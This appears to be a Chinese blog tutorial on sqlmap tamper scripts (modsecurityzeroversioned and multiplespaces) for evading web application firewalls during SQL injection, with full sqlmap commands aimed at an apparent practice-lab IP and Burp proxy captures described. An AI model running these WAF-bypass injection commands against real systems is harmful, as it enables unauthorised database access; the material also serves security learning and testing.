0
点赞
收藏
分享

微信扫一扫

sqlmap从入门到精通-第七章-7-13 绕过WAF脚本-modsecurityzeroversioned&multiplespaces.py

进击的铁雾 2022-06-21 阅读 30

26. modsecurityzeroversioned.py脚本

使用带有数字0的注释(/*!00000 */--) 包围整个完整的查询 适用于mysql数据库

实战演示:

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="modsecurityzeroversioned.py" --proxy="http://127.0.0.1:8080" -batch

sqlmap从入门到精通-第七章-7-13 绕过WAF脚本-modsecurityzeroversioned&multiplespaces.py_python

sqlmap从入门到精通-第七章-7-13 绕过WAF脚本-modsecurityzeroversioned&multiplespaces.py_sql_02

 确认是可以进行这正常注入,我们看看burp抓包效果

sqlmap从入门到精通-第七章-7-13 绕过WAF脚本-modsecurityzeroversioned&multiplespaces.py_sql_03

 

 sqlmap从入门到精通-第七章-7-13 绕过WAF脚本-modsecurityzeroversioned&multiplespaces.py_sql_04

 -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

27. multiplespaces.py脚本

这个作用是SQL注入关键字旁边附近多加个空格,例如:"tampler('1 union select bmfx'") 将其处理为 "'1 union select bmfx'" 适用于所有数据库

实战演示:

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="multiplespaces.py" --proxy="http://127.0.0.1:8080" -batch

sqlmap从入门到精通-第七章-7-13 绕过WAF脚本-modsecurityzeroversioned&multiplespaces.py_抓包_05

sqlmap从入门到精通-第七章-7-13 绕过WAF脚本-modsecurityzeroversioned&multiplespaces.py_sql_06

确认可以注入,我们看看burp抓包效果

sqlmap从入门到精通-第七章-7-13 绕过WAF脚本-modsecurityzeroversioned&multiplespaces.py_python_07

 效果还是比较明显的,添加了很多空格sqlmap从入门到精通-第七章-7-13 绕过WAF脚本-modsecurityzeroversioned&multiplespaces.py_抓包_08

 

迷茫的人生,需要不断努力,才能看清远方模糊的志向!

举报

相关推荐

0 条评论